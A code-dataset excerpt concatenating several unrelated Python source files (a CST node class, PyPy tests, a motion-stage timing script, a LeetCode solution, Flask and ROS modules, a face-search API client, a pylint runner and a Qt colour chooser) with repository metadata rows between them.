if key[0] != "_":
value = getattr(self, key)
lines.append(_indent(f"{key}={_pretty_repr(value)},"))
lines.append(")")
return "\n".join(lines)
@classmethod
def field(cls, *args: object, **kwargs: object) -> Any:
"""
A helper that allows us to easily use CSTNodes in dataclass constructor
defaults without accidentally aliasing nodes by identity across multiple
instances.
"""
# pyre-ignore Pyre is complaining about CSTNode not being instantiable,
# but we're only going to call this from concrete subclasses.
return field(default_factory=lambda: cls(*args, **kwargs))
class BaseLeaf(CSTNode, ABC):
@property
def children(self) -> Sequence[CSTNode]:
# override this with an optimized implementation
return _EMPTY_SEQUENCE
def _visit_and_replace_children(
self: _CSTNodeSelfT, visitor: CSTVisitorT
) -> _CSTNodeSelfT:
return self
class BaseValueToken(BaseLeaf, ABC):
"""
Represents the subset of nodes that only contain a value. Not all tokens from the
tokenizer will exist as BaseValueTokens. In places where the token is always a
constant value (e.g. a COLON token), the token's value will be implicitly folded
into the parent CSTNode, and hard-coded into the implementation of _codegen.
"""
value: str
def _codegen_impl(self, state: CodegenState) -> None:
state.add_token(self.value)
| 37.688742 | 89 | 0.649856 |
c25de9a41bdf3aa87bedd4ce9b6480b14619d153 | 1,235 | py | Python | pypy/tool/test/test_conftest1.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | 1 | 2019-05-27T00:58:46.000Z | 2019-05-27T00:58:46.000Z | pypy/tool/test/test_conftest1.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null | pypy/tool/test/test_conftest1.py | woodrow/pyoac | b5dc59e6a38e7912db47f26fb23ffa4764a3c0e7 | [
"MIT"
] | null | null | null |
import py
innertest = py.magic.autopath().dirpath('conftest1_innertest.py')
pytest_plugins = "pytest_pytester"
class TestPyPyTests:
def test_select_interplevel(self, testdir):
sorter = testdir.inline_run("-k", "interplevel", innertest)
passed, skipped, failed = sorter.listoutcomes()
assert len(passed) == 2
assert not skipped and not failed
for repevent in passed:
assert repevent.colitem.name in ('test_something', 'test_method')
def test_select_applevel(self, testdir):
sorter = testdir.inline_run("-k", "applevel", innertest)
passed, skipped, failed = sorter.listoutcomes()
assert len(passed) == 2
assert not skipped and not failed
for repevent in passed:
assert repevent.colitem.name in ('app_test_something', 'test_method_app')
def test_appdirect(self, testdir):
sorter = testdir.inline_run(innertest, '-k', 'applevel', '--runappdirect')
passed, skipped, failed = sorter.listoutcomes()
assert len(passed) == 2
print passed
names = [x.colitem.name for x in passed]
assert 'app_test_something' in names
assert 'test_method_app' in names
| 37.424242 | 85 | 0.654251 |
80849c1c1bd484cad89d4f4e107c1ef2fdc0a636 | 1,119 | py | Python | software/temcagt/smaract/tests/04_sync_vs_async.py | htem/GridTapeStage | 0b4764bc4ea8d64970ea481a32d6c7383d301989 | [
"RSA-MD"
] | 2 | 2020-02-07T10:34:23.000Z | 2021-09-24T02:28:10.000Z | software/temcagt/smaract/tests/04_sync_vs_async.py | htem/GridTapeStage | 0b4764bc4ea8d64970ea481a32d6c7383d301989 | [
"RSA-MD"
] | null | null | null | software/temcagt/smaract/tests/04_sync_vs_async.py | htem/GridTapeStage | 0b4764bc4ea8d64970ea481a32d6c7383d301989 | [
"RSA-MD"
] | null | null | null | #!/usr/bin/env python
import time
import smaract
import smaract.async
channel = 0
distance = 16000
l = 'usb:id:xxxxxxx'
# first try sync
#locs = smaract.find_systems()
#print locs
#l = locs[0]
#if len(l) == 0:
# raise Exception("No systems found")
print("Connecting to: %s" % l)
# sync
m = smaract.MCS(l)
t0 = time.time()
m.move_relative(channel, distance)
while m.status(0) != 0:
pass
t1 = time.time()
print("Sync move: %s" % (t1 - t0))
t0 = time.time()
p = m.position(channel)
t1 = time.time()
print("Sync pos: %s" % (t1 - t0))
t0 = time.time()
m.move_relative(channel, distance)
while m.status(0) != 0:
pass
p = m.position(channel)
t1 = time.time()
print("Sync pos: %s" % (t1 - t0))
m.disconnect()
# async
m = smaract.AMCS(l)
t0 = time.time()
m.move_relative(channel, -distance)
m.wait(0)
t1 = time.time()
print("ASync move: %s" % (t1 - t0))
t0 = time.time()
position = m.position(channel)
t1 = time.time()
print("ASync pos: %s" % (t1 - t0))
t0 = time.time()
m.move_relative(channel, -distance)
m.wait(0)
p = m.position(0)
t1 = time.time()
print("ASync pos: %s" % (t1 - t0))
m.disconnect()
| 16.455882 | 40 | 0.634495 |
ee0d1260a62afb742e1cfef37929b1b869416ca7 | 662 | py | Python | Python3/0129-Sum-Root-to-Leaf-Numbers/soln.py | wyaadarsh/LeetCode-Solutions | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | [
"MIT"
] | 5 | 2020-07-24T17:48:59.000Z | 2020-12-21T05:56:00.000Z | Python3/0129-Sum-Root-to-Leaf-Numbers/soln.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | null | null | null | Python3/0129-Sum-Root-to-Leaf-Numbers/soln.py | zhangyaqi1989/LeetCode-Solutions | 2655a1ffc8678ad1de6c24295071308a18c5dc6e | [
"MIT"
] | 2 | 2020-07-24T17:49:01.000Z | 2020-08-31T19:57:35.000Z | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def sumNumbers(self, root):
"""
:type root: TreeNode
:rtype: int
"""
def traverse(node, val):
if node is not None:
val = val * 10 + node.val
if node.left is None and node.right is None:
return val
else:
return traverse(node.left, val) + traverse(node.right, val)
else:
return 0
return traverse(root, 0)
| 27.583333 | 79 | 0.480363 |
122cd2a05861517a6301546ef5f01a04c21114ef | 1,071 | py | Python | app/v1/modules/auth/__init__.py | speduardo/flask-boilerplate | d50d8d0f15a08c4905a2029b0ae9637489624c9a | [
"MIT"
] | 1 | 2020-05-26T01:53:58.000Z | 2020-05-26T01:53:58.000Z | app/v1/modules/auth/__init__.py | speduardo/flask-boilerplate | d50d8d0f15a08c4905a2029b0ae9637489624c9a | [
"MIT"
] | null | null | null | app/v1/modules/auth/__init__.py | speduardo/flask-boilerplate | d50d8d0f15a08c4905a2029b0ae9637489624c9a | [
"MIT"
] | null | null | null | """
Auth module
===========
"""
#from app.extensions import login_manager, oauth2
from app.v1.core.api import api_v1
def load_user_from_request(request):
"""
Load user from OAuth2 Authentication header.
"""
user = None
#if hasattr(request, 'oauth'):
# user = request.oauth.user
#else:
# is_valid, oauth = oauth2.verify_request(scopes=[])
# if is_valid:
# user = oauth.user
return user
def init_app(app, **kwargs):
# pylint: disable=unused-argument
"""
Init auth module.
"""
# Bind Flask-Login for current_user
#login_manager.request_loader(load_user_from_request)
# Register OAuth scopes
#api_v1.add_oauth_scope('auth:read', "Provide access to auth details")
#api_v1.add_oauth_scope('auth:write', "Provide write access to auth details")
# Touch underlying modules
from . import models, views, resources # pylint: disable=unused-import
# Mount authentication routes
#app.register_blueprint(views.auth_blueprint)
api_v1.add_namespace(resources.api)
| 26.121951 | 81 | 0.674136 |
c4bc61d832484a34ae928af094d25db9bd925929 | 6,262 | py | Python | Findclone/aiofindclone.py | vypivshiy/Findclone_api | 97ec5f33929b5cd3bdf670d829596749c3797dbc | [
"MIT"
] | 5 | 2020-11-16T11:41:05.000Z | 2021-09-09T22:54:37.000Z | Findclone/aiofindclone.py | vypivshiy/Findclone_api | 97ec5f33929b5cd3bdf670d829596749c3797dbc | [
"MIT"
] | 2 | 2021-05-02T21:34:47.000Z | 2021-08-21T23:30:44.000Z | Findclone/aiofindclone.py | vypivshiy/Findclone_api | 97ec5f33929b5cd3bdf670d829596749c3797dbc | [
"MIT"
] | 2 | 2021-04-27T01:14:15.000Z | 2021-09-30T06:44:40.000Z | from aiohttp import ClientSession, FormData
from Findclone import __version__
from .models import Account, Profiles, Histories, get_builder
from .utils import random_string, paint_boxes
from .exceptions import a_error_handler, FindcloneError
from io import BufferedReader, BytesIO
class FindcloneAsync:
"""async findclone api class
Attributes:
headers : dict - set requests headers
"""
def __init__(self):
self._session = ClientSession()
self.headers = {"User-Agent": f"findclone-api/{__version__}"}
self.__builder = get_builder().build_aio_response
self._session_key = None
self._userid = None
self.__info = None
async def login(self,
login: [str, None] = None,
password: [str, None] = None,
session_key: [str, None] = None,
userid: [str, int, None] = None) -> bool:
"""
*coro
Findclone authorisation
:param login: account login
:param password: account password
:param session_key: account session_key
:param userid: account userid
:return: True is auth success
"""
if login and password:
async with self._session.post("https://findclone.ru/login", data={"phone": login,
"password": password}) as response:
await a_error_handler(response)
resp = await response.json()
self.__info = await self.__builder(response)
self._session_key = resp["session_key"]
self._userid = resp["userid"]
self.headers.update({'session-key': self._session_key, 'user-id': str(self._userid)})
return True
elif session_key and userid:
self.headers.update({"session-key": session_key, "user-id": str(userid)})
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
await a_error_handler(response)
self.__info = await self.__builder(response)
self._session_key = session_key
self._userid = userid
return True
else:
raise FindcloneError("Need login and password or session-key and _userid")
@property
async def info(self) -> Account:
"""
*coro
return account information
:return: Account object
"""
async with self._session.get("https://findclone.ru/profile", headers=self.headers) as response:
info = await self.__builder(response)
self.__info = info
return info
async def upload(self,
file: [str, BufferedReader],
face_box_id: int = None,
timeout: float = 180) -> [Profiles, BytesIO]:
"""
*coro
upload image or image url and return Profiles object or BytesIO object
:param file: image direct download link or path
:param face_box_id: OPTIONAL, send facebox id if 2 or more faces are detected
:param timeout: OPTIONAL - max timeout delay
:return: Profiles object or BytesIO if 2 or more faces are detected
"""
data = FormData()
if file.startswith("http"):
async with self._session.get(file, headers=self.headers) as response:
file = await response.read()
data.add_field("uploaded_photo", file, filename=f"{random_string()}.png", content_type="image/png")
else:
data.add_field("uploaded_photo", open(file, "rb"), filename=f"{random_string()}.png",
content_type="image/png")
async with self._session.post("https://findclone.ru/upload2", data=data, headers=self.headers,
timeout=timeout) as response:
resp = await response.json()
if resp.get("faceBoxes"):
if face_box_id is not None:
async with self._session.get("https://findclone.ru/upload3", params={"id": face_box_id},
headers=self.headers) as response2:
resp = await self.__builder(response2)
return resp
else:
img_bytes = paint_boxes(file, resp) # return bytesIO object
return img_bytes
resp = await self.__builder(response)
return resp
async def history(self, offset: int = 0, count: int = 100) -> Histories:
"""
*coro
return object histories search for account
:param offset: int
:param count: int
:return: Histories object
"""
async with self._session.get("https://findclone.ru/hist", params={"offset": offset, "count": count},
headers=self.headers) as response:
history = await self.__builder(response)
return history
async def search(self, search_id: [int, str], count: int = 128) -> Profiles:
"""
*coro
:param search_id: [int, str] search id
:param count: [int] max Profiles count get
:return: Profiles object
"""
async with self._session.get("https://findclone.ru/search", params={"id": search_id, "count": count},
headers=self.headers) as response:
search_result = await self.__builder(response)
return search_result
@property
def get_session(self) -> dict:
"""
property
return session-key and _userid account
:return: dict {"session-key": session_key, "user-id": userid}
"""
_session = {"session-key": self._session_key, "user-id": self._userid}
return _session
def __str__(self):
return self.__info.__str__()
async def __aenter__(self) -> 'FindcloneAsync':
return self
async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:
await self._session.close()
async def close(self) -> None:
await self._session.close()
| 40.928105 | 115 | 0.569946 |
30d96561bfd1a9779a11f8ee639d19b0ff384b9b | 523 | py | Python | crazyswarm2/launch/teleop_launch.py | akmaralAW/crazyswarm2 | f5bbe893eacd860b5d712a4beaf8bd5d8fb505f8 | [
"MIT"
] | 9 | 2021-11-07T02:26:13.000Z | 2022-03-05T09:49:35.000Z | crazyswarm2/launch/teleop_launch.py | akmaralAW/crazyswarm2 | f5bbe893eacd860b5d712a4beaf8bd5d8fb505f8 | [
"MIT"
] | 13 | 2021-11-05T18:20:24.000Z | 2022-03-02T12:53:52.000Z | crazyswarm2/launch/teleop_launch.py | akmaralAW/crazyswarm2 | f5bbe893eacd860b5d712a4beaf8bd5d8fb505f8 | [
"MIT"
] | 2 | 2021-11-08T19:25:28.000Z | 2021-12-06T16:45:48.000Z | from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
return LaunchDescription([
Node(
package='crazyswarm2',
executable='teleop',
name='teleop'
),
Node(
package='joy',
executable='joy_node',
name='joy_node'
),
Node(
package='crazyswarm2',
executable='crazyswarm2_server',
name='crazyswarm2_server'
)
])
| 23.772727 | 44 | 0.537285 |
1122df2a03147df4aa8af8ed67432e671cd4d20b | 929 | py | Python | CursoEmVideo/Mundo2_EstruturasDeControle/desafio065.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo2_EstruturasDeControle/desafio065.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | CursoEmVideo/Mundo2_EstruturasDeControle/desafio065.py | jacksontenorio8/python | a484f019960faa5aa29177eff44a1bb1e3f3b9d0 | [
"MIT"
] | null | null | null | '''
@jacksontenorio8
Crie um programa que leia vários números inteiros pelo teclado. No final
da execução, mostre a média entre todos os valores e qual foi o maior e o
menor valores lidos. O programa deve perguntar ao usuário se ele quer ou
não continuar a digitar valores.
'''
resposta = 'S'
soma = quantidade = media = maior = menor = 0
while resposta in 'Ss':
numero = int(input('Digite um número: '))
soma += numero
quantidade += 1
if quantidade == 1:
maior = menor = numero
else:
if numero > maior:
maior = numero
if numero < menor:
menor = numero
resposta = str(input('Quer continuar? [S/N] ')).upper().strip()[0] #Transforma em maiúsculas, remove os espaços e considera só a primeira letra.
media = soma / quantidade
print(f'Você digitou {quantidade} números e a média foi {media}.')
print(f'O maior valor {maior} e o menor valor foi {menor}.')
| 37.16 | 148 | 0.666308 |
73ed6cbb71d0b484f24a640d2838c10c12dda6c9 | 7,406 | py | Python | dev/pylint_check.py | rw1nkler/vtr-verilog-to-routing | 74c8dbe1b3aca45c570f79feca0f4b3062e51b6a | [
"MIT"
] | null | null | null | dev/pylint_check.py | rw1nkler/vtr-verilog-to-routing | 74c8dbe1b3aca45c570f79feca0f4b3062e51b6a | [
"MIT"
] | null | null | null | dev/pylint_check.py | rw1nkler/vtr-verilog-to-routing | 74c8dbe1b3aca45c570f79feca0f4b3062e51b6a | [
"MIT"
] | 1 | 2020-07-22T08:11:40.000Z | 2020-07-22T08:11:40.000Z | #!/usr/bin/python3
"""
This script runs pylint on all of the paths specified by 'paths_to_lint'.
It prints the output of pylint for each path.
The returncode is the number of files that fail pylint.
"""
import pathlib
import sys
import subprocess
import argparse
repo_path = pathlib.Path(__file__).parent.parent.absolute()
################################################################################
################################# Paths to lint ################################
################################################################################
# List of all paths to search for Python files, and whether the search
# should be recursive.
paths_to_lint = [
(repo_path, False),
(repo_path / "dev", True),
(repo_path / "ODIN_II", True),
(repo_path / "ace2", True),
(repo_path / "doc", True),
(repo_path / "vpr", True),
(repo_path / "vtr_flow", True),
]
# These python files existed before the linter.
# At some point they should be cleaned up and removed from this list
grandfathered_files = [
repo_path / "sweep_build_configs.py",
repo_path / "dev/vtr_gdb_pretty_printers.py",
repo_path / "dev/submit_slurm.py",
repo_path / "dev/code_format_fixup.py",
repo_path / "dev/annealing_curve_plotter.py",
repo_path / "dev/autoformat.py",
repo_path / "dev/vpr_animate.py",
repo_path / "dev/external_subtrees.py",
repo_path / "ODIN_II/usefull_tools/restore_blackboxed_latches_from_blif_file.py",
repo_path / "ODIN_II/regression_test/parse_result/parse_result.py",
repo_path / "ODIN_II/regression_test/parse_result/conf/hooks.py",
repo_path / "ODIN_II/regression_test/tools/parse_odin_result.py",
repo_path / "ODIN_II/regression_test/tools/odin_script_util.py",
repo_path / "ODIN_II/regression_test/tools/ODIN_CONFIG.py",
repo_path / "ODIN_II/regression_test/tools/synth_using_quartus.py",
repo_path / "ODIN_II/regression_test/tools/odin_config_maker.py",
repo_path / "ODIN_II/regression_test/tools/synth_using_vl2mv.py",
repo_path / "ODIN_II/regression_test/tools/synth_using_odin.py",
repo_path / "ODIN_II/regression_test/tools/asr_vector_maker.py",
repo_path / "ODIN_II/regression_test/tools/8_bit_arithmetic_power_output.py",
repo_path / "ODIN_II/regression_test/tools/8_bit_input.py",
repo_path / "ace2/scripts/extract_clk_from_blif.py",
repo_path / "doc/src/vtr_version.py",
repo_path / "doc/src/conf.py",
repo_path / "doc/_exts/rrgraphdomain/__init__.py",
repo_path / "doc/_exts/sdcdomain/__init__.py",
repo_path / "doc/_exts/archdomain/__init__.py",
repo_path / "vpr/scripts/compare_timing_reports.py",
repo_path / "vpr/scripts/profile/util.py",
repo_path / "vpr/scripts/profile/parse_and_plot_detailed.py",
repo_path / "vtr_flow/scripts/upgrade_arch.py",
repo_path / "vtr_flow/scripts/download_titan.py",
repo_path / "vtr_flow/scripts/ispd2vtr.py",
repo_path / "vtr_flow/scripts/download_ispd.py",
repo_path / "vtr_flow/scripts/qor_compare.py",
repo_path / "vtr_flow/scripts/blif_splicer.py",
repo_path / "vtr_flow/scripts/benchtracker/interface_db.py",
repo_path / "vtr_flow/scripts/benchtracker/server_db.py",
repo_path / "vtr_flow/scripts/benchtracker/util.py",
repo_path / "vtr_flow/scripts/benchtracker/plotter-offline.py",
repo_path / "vtr_flow/scripts/benchtracker/populate_db.py",
repo_path / "vtr_flow/scripts/benchtracker/flask_cors/core.py",
repo_path / "vtr_flow/scripts/benchtracker/flask_cors/version.py",
repo_path / "vtr_flow/scripts/benchtracker/flask_cors/six.py",
repo_path / "vtr_flow/scripts/benchtracker/flask_cors/decorator.py",
repo_path / "vtr_flow/scripts/benchtracker/flask_cors/extension.py",
repo_path / "vtr_flow/scripts/python_libs/utils.py",
repo_path / "vtr_flow/scripts/arch_gen/arch_gen.py",
repo_path / "vtr_flow/scripts/spice/run_spice.py",
]
################################################################################
################################################################################
################################################################################
class TermColor:
""" Terminal codes for printing in color """
# pylint: disable=too-few-public-methods
PURPLE = "\033[95m"
BLUE = "\033[94m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
RED = "\033[91m"
END = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def error(*msg, returncode=-1):
""" Print an error message and exit program """
print(TermColor.RED + "ERROR:", " ".join(str(item) for item in msg), TermColor.END)
sys.exit(returncode)
def expand_paths():
""" Build a list of all python files to process by going through 'paths_to_lint' """
paths = []
for (path, is_recursive) in paths_to_lint:
# Make sure all hard-coded paths point to .py files
if path.is_file():
if path.suffix.lower() != ".py":
print(path, "does note have extension '.py'")
sys.exit(-1)
paths.append(path)
# If path is a directory, search for .py files
elif path.is_dir():
if is_recursive:
glob_str = "**/*.py"
else:
glob_str = "*.py"
for glob_path in path.glob(glob_str):
paths.append(glob_path)
# Non-existant paths, and unhanlded file types error
elif not path.exists():
error("Non-existant path:", path)
else:
error("Unhandled path:", path)
return paths
def main():
"""
Run pylint on specified files.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
"--check_grandfathered",
action="store_true",
help="Also check grandfathered files for lint errors.",
)
args = parser.parse_args()
# Expand all paths
paths = expand_paths()
print(TermColor.BLUE + "Linting", len(paths), "python files.", TermColor.END)
# Lint files
num_error_files = 0
for path in paths:
relpath_str = str(path.relative_to(repo_path))
if (path in grandfathered_files) and not args.check_grandfathered:
print(
TermColor.YELLOW + relpath_str, "skipped (grandfathered)", TermColor.END,
)
continue
# Pylint checks to ignore
ignore_list = []
# Ignore function argument indenting, which is currently incompabile with black
# https://github.com/psf/black/issues/48
ignore_list.append("C0330")
# Build pylint command
cmd = ["pylint", path, "-s", "n", "--disable=C0330"]
if ignore_list:
cmd.append("--disable=" + ",".join(ignore_list))
# Run pylint and check output
process = subprocess.run(cmd, check=False, stdout=subprocess.PIPE)
if process.returncode:
print(TermColor.RED + relpath_str, "has lint errors", TermColor.END)
print(process.stdout.decode().strip())
num_error_files += 1
else:
print(TermColor.GREEN + relpath_str, "passed", TermColor.END)
if num_error_files:
error(num_error_files, "file(s) failed lint test.", returncode=num_error_files)
else:
print(TermColor.GREEN + "Lint passed.", TermColor.END)
if __name__ == "__main__":
main()
| 37.03 | 89 | 0.625844 |
9ce92af3e911484e4dbd57cc3e1b14537daec916 | 9,906 | py | Python | python/GafferUI/ColorChooser.py | ddesmond/gaffer | 4f25df88103b7893df75865ea919fb035f92bac0 | [
"BSD-3-Clause"
] | 561 | 2016-10-18T04:30:48.000Z | 2022-03-30T06:52:04.000Z | python/GafferUI/ColorChooser.py | ddesmond/gaffer | 4f25df88103b7893df75865ea919fb035f92bac0 | [
"BSD-3-Clause"
] | 1,828 | 2016-10-14T19:01:46.000Z | 2022-03-30T16:07:19.000Z | python/GafferUI/ColorChooser.py | ddesmond/gaffer | 4f25df88103b7893df75865ea919fb035f92bac0 | [
"BSD-3-Clause"
] | 120 | 2016-10-18T15:19:13.000Z | 2021-12-20T16:28:23.000Z | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import sys
import imath
import IECore
import Gaffer
import GafferUI
from Qt import QtGui
# A custom slider for drawing the backgrounds.
class _ComponentSlider( GafferUI.Slider ) :
def __init__( self, color, component, useDisplayTransform = True, **kw ) :
min = hardMin = 0
max = hardMax = 1
if component in ( "r", "g", "b", "v" ) :
hardMax = sys.float_info.max
GafferUI.Slider.__init__( self, 0.0, min, max, hardMin, hardMax, **kw )
self.color = color
self.component = component
self.__useDisplayTransform = useDisplayTransform
if self.__useDisplayTransform :
GafferUI.DisplayTransform.changedSignal().connect( Gaffer.WeakMethod( self.__displayTransformChanged ), scoped = False )
def setColor( self, color ) :
self.color = color
self._qtWidget().update()
def getColor( self ) :
return self.color
def _drawBackground( self, painter ) :
size = self.size()
grad = QtGui.QLinearGradient( 0, 0, size.x, 0 )
displayTransform = GafferUI.DisplayTransform.get() if self.__useDisplayTransform else lambda x : x
if self.component == "a" :
c1 = imath.Color3f( 0 )
c2 = imath.Color3f( 1 )
else :
c1 = imath.Color3f( self.color[0], self.color[1], self.color[2] )
c2 = imath.Color3f( self.color[0], self.color[1], self.color[2] )
if self.component in "hsv" :
c1 = c1.rgb2hsv()
c2 = c2.rgb2hsv()
a = { "r" : 0, "g" : 1, "b" : 2, "h" : 0, "s" : 1, "v": 2 }[self.component]
c1[a] = 0
c2[a] = 1
numStops = max( 2, size.x // 2 )
for i in range( 0, numStops ) :
t = float( i ) / (numStops-1)
c = c1 + (c2-c1) * t
if self.component in "hsv" :
c = c.hsv2rgb()
grad.setColorAt( t, self._qtColor( displayTransform( c ) ) )
brush = QtGui.QBrush( grad )
painter.fillRect( 0, 0, size.x, size.y, brush )
def __displayTransformChanged( self ) :
self._qtWidget().update()
class ColorChooser( GafferUI.Widget ) :
ColorChangedReason = IECore.Enum.create( "Invalid", "SetColor", "Reset" )
def __init__( self, color=imath.Color3f( 1 ), useDisplayTransform = True, **kw ) :
self.__column = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 )
GafferUI.Widget.__init__( self, self.__column, **kw )
self.__color = color
self.__defaultColor = color
self.__sliders = {}
self.__numericWidgets = {}
self.__componentValueChangedConnections = []
with self.__column :
# sliders and numeric widgets
for component in "rgbahsv" :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 ) :
numericWidget = GafferUI.NumericWidget( 0.0 )
numericWidget.setFixedCharacterWidth( 6 )
numericWidget.component = component
self.__numericWidgets[component] = numericWidget
slider = _ComponentSlider( color, component, useDisplayTransform = useDisplayTransform )
self.__sliders[component] = slider
self.__componentValueChangedConnections.append(
numericWidget.valueChangedSignal().connect( Gaffer.WeakMethod( self.__componentValueChanged ), scoped = False )
)
self.__componentValueChangedConnections.append(
slider.valueChangedSignal().connect( Gaffer.WeakMethod( self.__componentValueChanged ), scoped = False )
)
# initial and current colour swatches
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, parenting = { "expand" : True } ) :
self.__initialColorSwatch = GafferUI.ColorSwatch( color, useDisplayTransform = useDisplayTransform, parenting = { "expand" : True } )
self.__initialColorSwatch.buttonPressSignal().connect( Gaffer.WeakMethod( self.__initialColorPress ), scoped = False )
GafferUI.Spacer( imath.V2i( 4, 40 ) )
self.__colorSwatch = GafferUI.ColorSwatch( color, useDisplayTransform = useDisplayTransform, parenting = { "expand" : True } )
self.__colorChangedSignal = Gaffer.Signal2()
self.__updateUIFromColor()
## The default color starts as the value passed when creating the dialogue.
# It is represented with a swatch which when clicked will revert the current
# selection back to the original.
def setInitialColor( self, color ) :
self.__initialColorSwatch.setColor( color )
def getInitialColor( self ) :
return self.__initialColorSwatch.getColor()
def setColor( self, color ) :
self.__setColorInternal( color, self.ColorChangedReason.SetColor )
def getColor( self ) :
return self.__color
## A signal emitted whenever the color is changed. Slots should
# have the signature slot( ColorChooser, reason ). The reason
# argument may be passed either a ColorChooser.ColorChangedReason,
# a Slider.ValueChangedReason or a NumericWidget.ValueChangedReason
# to describe the reason for the change.
def colorChangedSignal( self ) :
return self.__colorChangedSignal
## Returns True if a user would expect the specified sequence
# of changes to be merged into a single undoable event.
@classmethod
def changesShouldBeMerged( cls, firstReason, secondReason ) :
if isinstance( firstReason, GafferUI.Slider.ValueChangedReason ) :
return GafferUI.Slider.changesShouldBeMerged( firstReason, secondReason )
elif isinstance( firstReason, GafferUI.NumericWidget.ValueChangedReason ) :
return GafferUI.NumericWidget.changesShouldBeMerged( firstReason, secondReason )
return False
def __initialColorPress( self, button, event ) :
self.__setColorInternal( self.getInitialColor(), self.ColorChangedReason.Reset )
def __componentValueChanged( self, componentWidget, reason ) :
## \todo We're doing the clamping here because NumericWidget
# doesn't provide the capability itself. Add the functionality
# into the NumericWidget and remove this code.
componentValue = componentWidget.getValue()
componentValue = max( componentValue, 0 )
if componentWidget.component in ( "a", "h", "s" ) :
componentValue = min( componentValue, 1 )
newColor = self.__color.__class__( self.__color )
if componentWidget.component in ( "r", "g", "b", "a" ) :
a = { "r" : 0, "g" : 1, "b" : 2, "a" : 3 }[componentWidget.component]
newColor[a] = componentValue
else :
newColor = newColor.rgb2hsv()
a = { "h" : 0, "s" : 1, "v" : 2 }[componentWidget.component]
newColor[a] = componentValue
newColor = newColor.hsv2rgb()
self.__setColorInternal( newColor, reason )
def __setColorInternal( self, color, reason ) :
dragBeginOrEnd = reason in (
GafferUI.Slider.ValueChangedReason.DragBegin,
GafferUI.Slider.ValueChangedReason.DragEnd,
GafferUI.NumericWidget.ValueChangedReason.DragBegin,
GafferUI.NumericWidget.ValueChangedReason.DragEnd,
)
if color != self.__color or dragBeginOrEnd :
# we never optimise away drag begin or end, because it's important
# that they emit in pairs.
self.__color = color
self.__colorSwatch.setColor( color )
self.__colorChangedSignal( self, reason )
## \todo This is outside the conditional because the clamping we do
# in __componentValueChanged means the color value may not correspond
# to the value in the ui, even if it hasn't actually changed. Move this
# back inside the conditional when we get the clamping performed internally
# in NumericWidget.
self.__updateUIFromColor()
def __updateUIFromColor( self ) :
with Gaffer.BlockedConnection( self.__componentValueChangedConnections ) :
c = self.getColor()
for slider in self.__sliders.values() :
slider.setColor( c )
for component, index in ( ( "r", 0 ), ( "g", 1 ), ( "b", 2 ) ) :
self.__sliders[component].setValue( c[index] )
self.__numericWidgets[component].setValue( c[index] )
if c.dimensions() == 4 :
self.__sliders["a"].setValue( c[3] )
self.__numericWidgets["a"].setValue( c[3] )
self.__sliders["a"].parent().setVisible( True )
else :
self.__sliders["a"].parent().setVisible( False )
c = c.rgb2hsv()
for component, index in ( ( "h", 0 ), ( "s", 1 ), ( "v", 2 ) ) :
self.__sliders[component].setValue( c[index] )
self.__numericWidgets[component].setValue( c[index] )
| 35.505376 | 137 | 0.705734 |
81ceda09dda34bb61429a658769b1c0f4859dc73 | 1,475 | py | Python | application/flicket/views/history.py | juangom/flicket | 56be865bbd715655da4eb4107294effc8a76709c | [
"MIT"
] | null | null | null | application/flicket/views/history.py | juangom/flicket | 56be865bbd715655da4eb4107294effc8a76709c | [
"MIT"
] | null | null | null | application/flicket/views/history.py | juangom/flicket | 56be865bbd715655da4eb4107294effc8a76709c | [
"MIT"
] | null | null | null | #! usr/bin/python3
# -*- coding: utf-8 -*-
#
# Flicket - copyright Paul Bourne: evereux@gmail.com
from flask import render_template, url_for
from flask_babel import gettext
from flask_login import login_required
